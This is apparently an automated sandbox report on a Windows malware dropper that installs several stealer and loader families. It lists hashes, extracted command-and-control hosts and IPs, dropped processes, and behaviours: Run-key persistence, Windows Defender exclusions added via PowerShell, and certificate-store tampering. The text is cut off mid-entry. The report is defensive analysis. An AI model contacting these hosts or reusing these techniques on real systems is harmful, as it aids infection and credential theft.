fabookie | ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7

Resubmissions

14-07-2024 08:22

240714-j929savhlh 10

14-07-2024 07:28

240714-ja5kvstfnd 10

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
14-07-2024 07:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
Size

4.9MB
MD5

44de9a092646de93067a5ae63cdb87de
SHA1

5db8c09d48e6e7602184634c1585d48f651d1197
SHA256

ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7
SHA512

2efd29a015b7d0986a879e47f2d93ef89f023f2f792404d253b241ceb2f8b7944f14e825f5eb1529ed7096506fb10fcde22d2e992553a8fe069dfa764a8a285a
SSDEEP

98304:FzzOsPu6locsuuFpSClTfqWrtCazwzs+CVGIOlmS23nlODn373muvk:pOSnlRvuOAmUwoQil4LWu8

Score

10^/10

fabookie gcleaner lgoogloader onlylogger redline sectoprat vidar 1 933 downloader execution infostealer loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Extracted

Family

vidar

Version

41.1

Botnet

933

https://mas.to/@bardak1ho

Attributes

profile_id
933

Extracted

Family

redline

Botnet

193.203.203.82:63852

Signatures

Detect Fabookie payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe	family_fabookie

Detects LgoogLoader payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1640-15-0x00000000000B0000-0x00000000000C2000-memory.dmp	family_lgoogloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/328-409-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/328-409-0x0000000000400000-0x0000000000422000-memory.dmp	family_sectoprat

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2996-280-0x0000000000400000-0x000000000046A000-memory.dmp	family_onlylogger
behavioral1/memory/2996-370-0x0000000000400000-0x000000000046A000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2272-279-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

51 1708 rundll32.exe
72 1708 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2140 powershell.exe

flow	pid	process
51	1708	rundll32.exe
72	1708	rundll32.exe

pid	process
2140	powershell.exe

Executes dropped EXE 22 IoCs

Processes:

Chrome 5.exeinst001.exeDownFlSetup110.exeFirstoffer.exesetup.exeInstall.EXEinstall.exesfx_123_206.exe7.exesetup_2.exesetup_2.tmpsetup_2.exejhuuee.exe11.exeliuyan-game.exesetup_2.tmp4MCYlgNAW.eXEservices64.exeinstall.exeINSTAL~1.EXEsihost64.exef7861bf.exe

pid	process
1880	Chrome 5.exe
1640	inst001.exe
1652	DownFlSetup110.exe
2272	Firstoffer.exe
2996	setup.exe
2080	Install.EXE
2860	install.exe
2648	sfx_123_206.exe
1148	7.exe
2924	setup_2.exe
2920	setup_2.tmp
1384	setup_2.exe
1316	jhuuee.exe
1068	11.exe
1300	liuyan-game.exe
2200	setup_2.tmp
1960	4MCYlgNAW.eXE
1652	services64.exe
328	install.exe
1312	INSTAL~1.EXE
588	sihost64.exe
2068	f7861bf.exe

Loads dropped DLL 51 IoCs

Processes:

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exesetup.exesetup_2.exesetup_2.tmpsetup_2.exesetup_2.tmpcmd.exerundll32.exerundll32.exeWerFault.exeChrome 5.exeinstall.exeservices64.exeWerFault.exe

pid	process
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
2996	setup.exe
2996	setup.exe
2996	setup.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
2924	setup_2.exe
2920	setup_2.tmp
2920	setup_2.tmp
2920	setup_2.tmp
2920	setup_2.tmp
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
1384	setup_2.exe
2200	setup_2.tmp
2200	setup_2.tmp
2200	setup_2.tmp
2632	cmd.exe
2616	rundll32.exe
2616	rundll32.exe
2616	rundll32.exe
1708	rundll32.exe
1708	rundll32.exe
1708	rundll32.exe
2740	WerFault.exe
2740	WerFault.exe
2740	WerFault.exe
2740	WerFault.exe
2740	WerFault.exe
2740	WerFault.exe
2740	WerFault.exe
1880	Chrome 5.exe
2860	install.exe
1652	services64.exe
1708	rundll32.exe
1708	rundll32.exe
1708	rundll32.exe
1708	rundll32.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe
2588	WerFault.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Install.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Install.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

Processes:

flow	ioc
24	iplogger.org
19	iplogger.org
22	iplogger.org
26	iplogger.org
56	iplogger.org
57	iplogger.org
77	raw.githubusercontent.com
78	raw.githubusercontent.com
17	iplogger.org

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

23 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

install.exe

description pid process target process

PID 2860 set thread context of 328 2860 install.exe install.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2740 2272 WerFault.exe Firstoffer.exe
2588 2068 WerFault.exe f7861bf.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1524 taskkill.exe

flow	ioc
23	ip-api.com

description	pid	process	target process
PID 2860 set thread context of 328	2860	install.exe	install.exe

pid	pid_target	process	target process
2740	2272	WerFault.exe	Firstoffer.exe
2588	2068	WerFault.exe	f7861bf.exe

pid	process
1524	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 38 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEmshta.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "427104075"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003125cc29be9a0e41b44a3d73dc8faf7100000000020000000000106600000001000020000000e8b1610fcc6e9d1e242c6bdcffd71259ef0a797134f3235edb1dcb16a9167082000000000e8000000002000020000000cf84e8b6ac08d4ecda931b865d50b48cc94033b6485487b77c940f4222fd481390000000f2e18d5c808a7b9f4f69b3ebde3e26f2938344647bff53f406fc3951f140e0ec6215a841ef2d164c247cd28acfe0bfb7a94b372767040d03d1626edff9625f3cac629c40a1c2be97f59bffa1bc59abd9c55424483dfc4aa2cf4a4bfcb2d960c9f0859450547ac1d68f0afc82cdde71bdfda14d1834a7ec9110f73c71185cf114efd20b60bd96113a4407b1d68f31e80b40000000d00a071a44d8520eebbc315cc67328e258722b28665c8d67ed813d12ea7ef25b33b67e2008dab3313b8d0d4c49cc70b6ae5e10cca34e5d7b861a73cb43ae8ba9	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003125cc29be9a0e41b44a3d73dc8faf71000000000200000000001066000000010000200000001a2249afb20b778c5ff92c7d8af73c194a1b479d2b0e5109836bf86f1cb73334000000000e8000000002000020000000608bded004624c382000c08128857ec2a41fb1a6e2a0072878f230feed8276562000000096654555bac6dccdcefaf3919989a91bc37ee8ad637000da677fb74c1c5619a64000000092024a4ca44ac1d9c2f9e80b368bf0a10731f6d8dd3b497888af46b54ed0cf6233c23140ece15e6db00c87cfa70f700dedb1bcf8bbfb5f3f1e1d5be0d33c7587	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30b56cb9bfd5da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E4073361-41B2-11EF-8CC6-7ED57E6FAC85} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

install.exeFirstoffer.exeDownFlSetup110.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Firstoffer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	DownFlSetup110.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	DownFlSetup110.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 